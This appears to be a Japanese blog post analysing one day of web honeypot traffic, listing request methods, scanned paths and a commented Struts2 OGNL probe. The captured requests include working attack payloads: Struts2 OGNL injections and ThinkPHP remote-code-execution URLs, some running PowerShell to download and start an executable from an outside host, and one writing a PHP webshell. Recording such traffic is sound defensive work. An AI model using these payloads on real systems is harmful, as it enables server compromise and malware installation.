honeypotの簡易解析24日目

honeypot

2019-04-24のアクセス数は562件でした。

■送信元IPアドレスの数は 57件です。

■メソッドの一覧と件数は以下です。

method総数
CONNECT4
GET261
HEAD2
POST294
PROPFIND1
合計 結果562

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET41
/ HEAD1
/ PROPFIND1
/_404.phpPOST1
/_query.phpGET1
/.phpPOST1
/.well-known/security.txtGET1
//MyAdmin/scripts/setup.phpGET2
//phpmyadmin/scripts/setup.phpGET2
//pma/scripts/setup.phpGET1
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_
MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess
%3d%23dm)%3a((%23container%3d%23context%5b%27
com.opensymphony.xwork2.ActionContext.container%27
%5d).(%23ognlUtil%3d%23container.getInstance(%40
com.opensymphony.xwork2.ognl.OgnlUtil%40class)).
(%23ognlUtil.getExcludedPackageNames().clear()).
(%23ognlUtil.getExcludedClasses().clear()).
(%23context.setMemberAccess(%23dm)))).
(%23res%3d%40org.apache.struts2.ServletActionContext%40
getResponse()).(%23res.addHeader(%27eresult%27%2c%27
struts2_security_check%27))%7d/index.action		POST1
/%25%7b(%23dm%3d%40ognl.OgnlContext%40
DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f
(%23_memberAccess%3d%23dm)%3a((%23container%3d%23
context%5b%27com.opensymphony.xwork2.ActionContext.container
%27%5d).(%23ognlUtil%3d%23container.getInstance
(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).
(%23ognlUtil.getExcludedPackageNames().clear()).
(%23ognlUtil.getExcludedClasses().clear()).
%23context.setMemberAccess(%23dm)))).
(%23res%3d%40org.apache.struts2.ServletActionContext%40
getResponse()).(%23res.addHeader(%27eresult%27%2c
%27struts2_security_check%27))%7d/login.action		POST1
/099.phpPOST1
/1.phpPOST6
/1111.phpPOST1
/12.phpPOST1
/1213.phpPOST1
/123.phpPOST1
/1hou.phpPOST1
/1ndex.phpPOST1
/1q.phpPOST1
/1x.phpGET1
/2.phpPOST2
/3.phpPOST1
/51.phpPOST1
/51314.phpPOST1
/520.phpPOST1
/5201314.phpPOST1
/56.phpPOST1
/666.phpPOST1
/7.phpPOST1
/777.phpPOST1
/92.phpPOST1
/9510.phpPOST1
/9678.phpPOST1
/a.phpPOST1
/aa.phpPOST1
/aaa.phpPOST1
/aaaa.phpPOST1
/aaaaaa1.phpPOST1
/acadmin.phpGET1
/admin-scripts.aspGET2
/admin/index.phpGET1
/admin/mysql/index.phpGET1
/admin/mysql2/index.phpGET1
/admin/phpMyAdmin/index.phpGET3
/admin/phpmyadmin2/index.phpGET1
/admin/pma/index.phpGET2
/Administrator.phpPOST1
/admn.phpPOST1
/ak.phpPOST1
/ak47.phpPOST1
/ak48.phpPOST1
/Alarg53.phpPOST1
/angge.phpPOST1
/aotu.phpPOST1
/aotu7.phpPOST1
/api.phpPOST2
/app.phpPOST1
/App986ca785.phpPOST1
/appserv.phpGET1
/aw.phpPOST1
/bak.phpPOST1
/boots.phpPOST1
/cacti/plugins/weathermap/editor.phpGET1
/cadre.phpPOST1
/cainiao.phpPOST1
/caonma.phpPOST1
/cc.phpPOST1
/cere.phpPOST1
/ceshi.phpPOST1
/cgi-bin/authLogin.cgiGET1
/chaoda.phpPOST1
/claroline/phpMyAdmin/index.phpGET2
/cmd.phpGET2
/cmd.phpPOST1
/cmdd.phpGET1
/cmv.phpGET1
/cn.phpPOST1
/cnm.phpPOST1
/composer.phpGET1
/composers.phpGET1
/conf.phpPOST1
/conf1g.phpPOST1
/confg.phpPOST4
/conflg.phpPOST2
/coon.phpPOST1
/core.phpPOST1
/cxfm666.phpPOST1
/d.phpPOST1
/d7.phpGET1
/data.phpPOST1
/db__.init.phpPOST1
/db_cts.phpGET1
/db_dataml.phpPOST1
/db_desql.phpPOST1
/db_pma.phpGET1
/db_session.init.phpPOST1
/db.init.phpPOST1
/db.phpPOST1
/db/index.phpGET1
/dbadmin/index.phpGET1
/default.phpPOST1
/defect.phpPOST1
/desktop.ini.phpGET1
/dexgp.phpPOST1
/diy.phpPOST1
/Drupal.phpGET1
/erba.phpPOST1
/errors.phpPOST1
/erwa.phpPOST1
/fack.phpPOST1
/favicon.icoGET1
/fb.phpPOST1
/feixiang.phpPOST1
/function.inc.phpPOST1
/fusheng.phpPOST1
/general.phpPOST1
/godkey.phpPOST1
/guai.phpPOST1
/h1.phpPOST1
/hack.phpPOST1
/hacly.phpPOST1
/hell.phpGET1
/hell.phpPOST1
/hello.phpPOST2
/help-e.phpGET1
/help.phpGET1
/help.phpPOST1
/hh.phpPOST1
/hm.phpPOST1
/home.phpGET1
/htdocs.phpGET1
/htfr.phpPOST1
/hue2.phpGET1
/HX.phpPOST1
/images/vuln.phpGET1
/index.actionPOST7
/index.phpGET1
/index.php?s=/index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP		GET1
/index1.phpPOST1
/indexa.phpPOST1
/info.phpPOST1
/info1.phpPOST1
/infoo.phpPOST1
/infos.phpPOST1
/ip.phpPOST1
/izom.phpGET2
/j.phpPOST1
/java.phpGET1
/knal.phpGET1
/kvast.phpPOST1
/l6.phpPOST1
/l7.phpPOST1
/l8.phpPOST1
/lala-dpr.phpGET1
/lala.phpGET1
/lang.php?f=1GET1
/lanke.phpPOST1
/lanyecn.phpPOST1
/lapan.phpPOST1
/ldw.phpPOST1
/liangchen.phpPOST1
/libraries/joomla/jmail.php?waled=1GET1
/libraries/joomla/jmails.php?waled=1GET1
/libraries/joomla/wl.php?0=1GET1
/license.phpGET1
/lindex.phpPOST1
/link.phpPOST1
/linkr.phpPOST1
/linkx.phpPOST1
/linux.phpPOST1
/linux1.phpPOST1
/linuxse.phpPOST1
/ljb.phpPOST1
/lm.phpPOST1
/lmn.phpPOST1
/log.phpGET1
/log.phpPOST1
/login.actionPOST7
/logon.phpGET1
/lol.phpGET1
/lost.phpPOST1
/lucky.phpPOST2
/lx.phpPOST1
/m.phpPOST1
/m.php?pbid=openPOST1
/manager/htmlGET46
/mazi.phpPOST1
/MCLi.phpPOST2
/meng.phpPOST1
/miao.phpPOST1
/min.phpPOST1
/mm.phpPOST1
/muhstik-dpr.phpGET1
/muhstik.phpGET2
/muhstik2.phpGET1
/muhstiks.phpGET1
/muieblackcatGET1
/mx.phpPOST1
/MyAdmin/index.phpGET2
/myadmin2/index.phpGET1
/mybestloves.phpPOST1
/mysql_admin/index.phpGET1
/mysql-admin/index.phpGET1
/mysql.phpPOST1
/mysql/admin/index.phpGET1
/mysql/dbadmin/index.phpGET1
/mysql/index.phpGET1
/mysql/mysqlmanager/index.phpGET1
/mysql/sqlmanager/index.phpGET1
/mysqladmin/index.phpGET1
/mz.phpPOST1
/neko.phpPOST1
/new_license.phpGET1
/no.phpPOST1
/nuoxi.phpPOST1
/okokok.phpPOST1
/orange.phpPOST1
/ou2.phpPOST1
/p.phpPOST1
/p34ky1337.phpPOST1
/payload.phpGET2
/paylog.phpPOST2
/pe.phpPOST1
/php.phpPOST1
/php2MyAdmin/index.phpGET1
/phpAdmin/index.phpGET2
/phpiMyAdmin/index.phpGET1
/phpinfi.phpPOST1
/phpini.phpPOST1
/phpma/index.phpGET1
/phpmy/index.phpGET1
/phpMyAbmin/index.phpGET1
/phpMyAdm1n/index.phpGET2
/phpMyadmi/index.phpGET1
/phpMyAdmin__/index.phpGET1
/phpMyadmin_bak/index.phpGET1
/phpMyAdmin-4.4.0/index.phpGET1
/phpmyadmin-old/index.phpGET1
/phpMyAdmin._/index.phpGET1
/phpMyAdmin.old/index.phpGET1
/phpMyAdmin/index.phpGET3
/phpmyadmin/phpmyadmin/index.phpGET3
/phpMyAdmin/scripts/db___.init.phpGET2
/phpmyadmin/scripts/setup.phpGET2
/phpMyAdmin+++—/index.phpGET1
/phpmyadmin0/index.phpGET1
/phpmyadmin1/index.phpGET2
/phpMyAdmin123/index.phpGET1
/phpmyadmin2/index.phpGET1
/phpmyadmin2222/index.phpGET1
/phpMyAdmina/index.phpGET1
/phpMyAdminold/index.phpGET1
/phpMyAdmins/index.phpGET1
/phpMyAdmion/index.phpGET1
/phpMydmin/index.phpGET1
/phpNyAdmin/index.phpGET1
/phppma/index.phpGET1
/phpStudy.phpPOST2
/pk1914.phpPOST1
/plugins/weathermap/editor.phpGET1
/pma-old/index.phpGET1
/pma.phpPOST1
/pma/index.phpGET2
/PMA2/index.phpGET1
/pmamy/index.phpGET1
/pmamy2/index.phpGET1
/pmd_online.phpGET1
/pmd/index.phpGET1
/post.phpPOST1
/ppp.phpPOST1
/ppx.phpPOST1
/program/index.phpGET1
/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20
(new-object%20System.Net.WebClient).DownloadFile
(‘http://fid.hognoob.se/download.exe’,
‘C:/Windows/temp/tbtldtctbsjzqhp8813.exe’);start%20
C:/Windows/temp/tbtldtctbsjzqhp8813.exe		GET1
/public/index.php?s=/index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20
$action%20=%20$_GET[‘xcmd’]		GET1
/public/index.php?s=index/think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20
/c%20powershell%20(new-object%20System.Net.WebClient).
DownloadFile(‘http://fid.hognoob.se/download.exe’,
‘C:/Windows/temp/tbtldtctbsjzqhp8813.exe’);start%20
C:/Windows/temp/tbtldtctbsjzqhp8813.exe		GET1
/pwd/index.phpGET1
/python.phpPOST1
/q.phpPOST3
/qa.phpPOST1
/qaq.phpPOST1
/qaz.phpPOST1
/qq.phpPOST5
/qq5262.phpPOST1
/qw.phpPOST1
/qwe.phpPOST1
/qwq.phpPOST1
/qwqw.phpPOST1
/repeat.phpPOST1
/robots.txtGET1
/robots.txtHEAD1
/ruyi.phpPOST1
/rxr.phpGET1
/s.phpPOST2
/s/index.phpGET1
/s1.phpPOST1
/scripts/setup.phpGET1
/sean.phpPOST1
/sha.phpPOST1
/shaAdmin/index.phpGET1
/she.phpPOST1
/sheep.phpPOST1
/shell.phpGET2
/shopdb/index.phpGET1
/sitemap.xmlGET1
/Skri.phpPOST1
/sllolx.phpPOST1
/spider.phpGET1
/ss.phpPOST2
/ssaa.phpPOST1
/sss.phpPOST2
/super.phpPOST1
/system.phpPOST1
/t6nv.phpGET1
/test.phpGET1
/test.phpPOST3
/test123.phpPOST2
/text.phpGET1
/tiandi.phpPOST1
/tmUnblock.cgiPOST1
/tomcat.phpPOST1
/tools/phpMyAdmin/index.phpGET2
/toor.phpPOST1
/typo3/phpmyadmin/index.phpGET1
/u.phpPOST1
/undx.phpGET1
/up.phpPOST1
/Updata.phpPOST1
/uploader.phpGET1
/uu.phpPOST1
/uuu.phpPOST1
/v/index.phpGET1
/ver.phpPOST1
/vuln1.phpPOST1
/w.phpPOST1
/wan.phpPOST1
/wanan.phpPOST1
/wb.phpPOST1
/wc.phpPOST1
/wcp.phpPOST1
/web/phpMyAdmin/index.phpGET2
/webdav/GET1
/webslee.phpPOST1
/weixiao.phpPOST1
/win.phpPOST1
/win1.phpPOST1
/wp-admins.phpPOST1
/wp-config.phpGET1
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.phpGET1
/wpc.phpGET1
/wpo.phpGET1
/wshell.phpPOST1
/wuwu11.phpPOST1
/www.phpPOST1
/www/phpMyAdmin/index.phpGET2
/x.phpGET1
/x.phpPOST4
/xampp/phpmyadmin/index.phpGET1
/xiao.phpPOST1
/xiaobin.phpPOST1
/xiaodai.phpPOST1
/xiaohei.phpPOST1
/xiaoma.phpPOST1
/xiaomae.phpPOST1
/xiaomar.phpPOST1
/xiaomo.phpPOST1
/xiaoxi.phpPOST1
/xiaoyu.phpPOST1
/xp.phpPOST1
/xshell.phpPOST1
/xw.phpPOST1
/xw1.phpPOST1
/xx.phpPOST2
/xxx.phpPOST1
/xxxx.phpPOST1
/xz.phpPOST1
/yao.phpPOST1
/yj.phpPOST1
/yumo.phpPOST1
/z.phpGET1
/z.phpPOST2
/zshmindex.phpPOST1
/zuo.phpPOST1
/zuoindex.phpPOST1
/zuos.phpPOST1
/zuoshou.phpPOST1
/zuoshss.phpPOST1
/zuoss.phpPOST1
/zxc0.phpPOST1
/zxc1.phpPOST2
/zxc2.phpPOST1
/zzk.phpPOST1
/zzz.phpPOST1
cn.bing.com:443CONNECT1
http://110.249.212.46/testget?q=23333&port=80GET2
http://api.ipify.org/GET1
http://httpheader.net/GET1
http://www.123cha.com/GET1
http://www.baidu.com/GET1
http://www.ip.cn/GET1
www.baidu.com:443CONNECT2
www.google.com:443CONNECT1

気になるlog

-=-=19件目のlog=-=-

[2019-04-24 09:52:30+0900] 103.79.155.162 hoge:80 "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 False 
POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1
 Host: hoge:80
 Accept-Language: zh_CN
 User-Agent: Auto Spider 1.0
 Accept-Encoding: gzip, deflate
 Connection: close
 Content-Length: 0
 Content-Type: application/x-www-form-urlencoded

Struts2の脆弱性、CVE2017-9791の脆弱性である。

調査の通信っぽい。よく見るとUser Agentが”Auto Spider 1.0″になっている。

よくよく見てみると、他にもUser Agentが”Auto Spider 1.0″のlogがあり、どれもstruts2の脆弱性を狙っていた。